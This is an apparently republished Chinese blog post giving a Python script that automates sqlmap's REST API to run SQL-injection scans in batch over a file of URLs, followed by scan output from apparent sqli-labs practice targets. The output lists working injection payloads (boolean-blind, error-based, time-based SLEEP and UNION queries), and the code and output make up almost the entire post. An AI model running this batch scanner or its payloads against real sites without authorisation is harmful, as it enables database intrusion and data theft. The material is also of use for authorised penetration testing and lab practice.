python实现sqlmapapi调用实现批量
Posted Rgylin
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了python实现sqlmapapi调用实现批量相关的知识,希望对你有一定的参考价值。
环境
sqlmap是可以被python调用的
首先在cmd中输入
python sqlmapapi.py -s
创建用python 对其连接
import requests
url='http://127.0.0.1:8775/task/new'
res1= requests.get(url)
print(res1.content.decode('utf-8'))
设置任务Id扫描信息
set_url= 'http://127.0.0.1:8775/option/'+taskId+'/set'
res_set_url= requests.post(set_url,data=json.dumps(data),headers=header)
开始扫描对应的Id人物
start_url='http://127.0.0.1:8775/scan/'+taskId+'/start'
res_start_url =requests.post(start_url,data=json.dumps(data),headers=header)
#print(res_start_url.content.decode('utf-8'))
读取扫描状态判断结果
status_url= 'http://127.0.0.1:8775/scan/'+taskId+'/status'
res_status= requests.get(status_url)
#print(res_status.content.decode('utf-8'))
读取数据
task_data_url = 'http://127.0.0.1:8775/scan/' + taskId + '/data'
task_data_res = requests.get(task_data_url)
print(task_data_res.content.decode('utf-8'))
综上脚本
import requests
import json
import time
def sqlapi(url):
data = {
'url': url
}
header = {
'Content-Type': 'application/json'
}
task_new_url ="http://127.0.0.1:8775/task/new"
res= requests.get(task_new_url)
taskId= res.json()['taskid']
if 'success' in res.content.decode('utf-8'):
print('sqlmapapi create success')
#进行设置
task_set_url = 'http://127.0.0.1:8775/option/'+taskId+'/set'
task_set_res= requests.post(task_set_url,data=json.dumps(data),headers= header)
if 'success' in task_set_res.content.decode('utf-8'):
print( 'setting success')
#启动扫描
task_start_url= 'http://127.0.0.1:8775/scan/'+taskId+'/start'
task_start_res= requests.post(task_start_url,data=json.dumps(data),headers=header)
if('success' in task_start_res.content.decode('utf-8')):
print('scan start success')
while 1:
task_status_url= 'http://127.0.0.1:8775/scan/'+taskId+'/status'
task_status_res= requests.get(task_status_url)
if('running' in task_status_res.content.decode('utf-8')):
print('sqlmap are running ')
pass
else:
task_data_url = 'http://127.0.0.1:8775/scan/' + taskId + '/data'
task_data_res = requests.get(task_data_url)
f.write(task_data_res.content.decode('utf-8'))
break
time.sleep(3)
if __name__ == '__main__':
f= open('C:/Users/ASUS/Desktop/res.txt','a+')
for i in open('url.txt','r').readlines():
print(i)
sqlapi(i)
效果为
{
"success": true,
"data": [
{
"status": 1,
"type": 0,
"value": {
"url": "http://172a4874-82ae-4ab9-b49c-39289835c0df.node4.buuoj.cn:80/Less-1/",
"query": "id=1",
"data": null
}
},
{
"status": 1,
"type": 1,
"value": [
{
"place": "GET",
"parameter": "id",
"ptype": 2,
"prefix": "'",
"suffix": " AND '[RANDSTR]'='[RANDSTR]",
"clause": [
1,
8,
9
],
"notes": [],
"data": {
"1": {
"title": "AND boolean-based blind - WHERE or HAVING clause",
"payload": "id=1' AND 8661=8661 AND 'sHbo'='sHbo",
"where": 1,
"vector": "AND [INFERENCE]",
"comment": "",
"templatePayload": null,
"matchRatio": 0.955,
"trueCode": 200,
"falseCode": 200
},
"2": {
"title": "mysql >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
"payload": "id=1' AND (SELECT 8903 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT (ELT(8903=8903,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vTDo'='vTDo",
"where": 1,
"vector": "AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
"comment": "",
"templatePayload": null,
"matchRatio": 0.955,
"trueCode": null,
"falseCode": null
},
"5": {
"title": "MySQL >= 5.0.12 AND time-based blind (query SLEEP)",
"payload": "id=1' AND (SELECT 1923 FROM (SELECT(SLEEP([SLEEPTIME])))BiUc) AND 'Tryd'='Tryd",
"where": 1,
"vector": "AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])",
"comment": "",
"templatePayload": null,
"matchRatio": 0.955,
"trueCode": 200,
"falseCode": null
},
"6": {
"title": "Generic UNION query (NULL) - 1 to 20 columns",
"payload": "id=-3722' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707871,0x7352646f5a70544c714d52424c656f6d534b5570614f50776b7244486c5a4d45684e6a6a4f575441,0x716a7a7171)-- -",
"where": 2,
"vector": [
2,
3,
"[GENERIC_SQL_COMMENT]",
"'",
" AND '[RANDSTR]'='[RANDSTR]",
"NULL",
2,
false,
null,
null,
null
],
"comment": "[GENERIC_SQL_COMMENT]",
"templatePayload": null,
"matchRatio": 0.955,
"trueCode": null,
"falseCode": null
}
},
"conf": {
"textOnly": null,
"titles": null,
"code": null,
"string": "Your",
"notString": null,
"regexp": null,
"optimize": null
},
"dbms": "MySQL",
"dbms_version": [
">= 5.0"
],
"os": null
}
]
}
],
"error": []
}{
"success": true,
"data": [
{
"status": 1,
"type": 0,
"value": {
"url": "http://172a4874-82ae-4ab9-b49c-39289835c0df.node4.buuoj.cn:80/Less-2/",
"query": "id=2",
"data": null
}
},
{
"status": 1,
"type": 1,
"value": [
{
"place": "GET",
"parameter": "id",
"ptype": 1,
"prefix": "",
"suffix": "",
"clause": [
1,
8,
9
],
"notes": [],
"data": {
"1": {
"title": "AND boolean-based blind - WHERE or HAVING clause",
"payload": "id=2 AND 8114=8114",
"where": 1,
"vector": "AND [INFERENCE]",
"comment": "",
"templatePayload": null,
"matchRatio": 0.948,
"trueCode": 200,
"falseCode": 200
},
"2": {
"title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
"payload": "id=2 AND (SELECT 6380 FROM(SELECT COUNT(*),CONCAT(0x71626b7671,(SELECT (ELT(6380=6380,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
"where": 1,
"vector": "AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
"comment": "",
"templatePayload": null,
"matchRatio": 0.948,
"trueCode": null,
"falseCode": null
},
"5": {
"title": "MySQL >= 5.0.12 AND time-based blind (query SLEEP)",
"payload": "id=2 AND (SELECT 9669 FROM (SELECT(SLEEP([SLEEPTIME])))Seva)",
"where": 1,
"vector": "AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])",
"comment": "",
"templatePayload": null,
"matchRatio": 0.948,
"trueCode": 200,
"falseCode": null
},
"6": {
"title": "Generic UNION query (NULL) - 1 to 20 columns",
"payload": "id=-3623 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7671,0x4948684a5a6170425875694658705767516e704a77666a415346726754454e6c5376414a70546158,0x716b716b71)-- -",
"where": 2,
"vector": [
2,
3,
"[GENERIC_SQL_COMMENT]",
"",
"",
"NULL",
2,
false,
null,
null,
null
],
"comment": "[GENERIC_SQL_COMMENT]",
"templatePayload": null,
"matchRatio": 0.948,
"trueCode": null,
"falseCode": null
}
},
"conf": {
"textOnly": null,
"titles": null,
"code": null,
"string": "Your",
"notString": null,
"regexp": null,
"optimize": null
},
"dbms": "MySQL",
"dbms_version": [
">= 5.0"
],
"os": null
}
]
},
{
"status": 1,
"type": 2,
"value": "back-end DBMS: MySQL >= 5.0 (MariaDB fork)"
}
],
"error": []
}
以上是关于python实现sqlmapapi调用实现批量的主要内容,如果未能解决你的问题,请参考以下文章
Python实现批量导入Markdown文件到WordPress(博客搬家工具,代码已开源)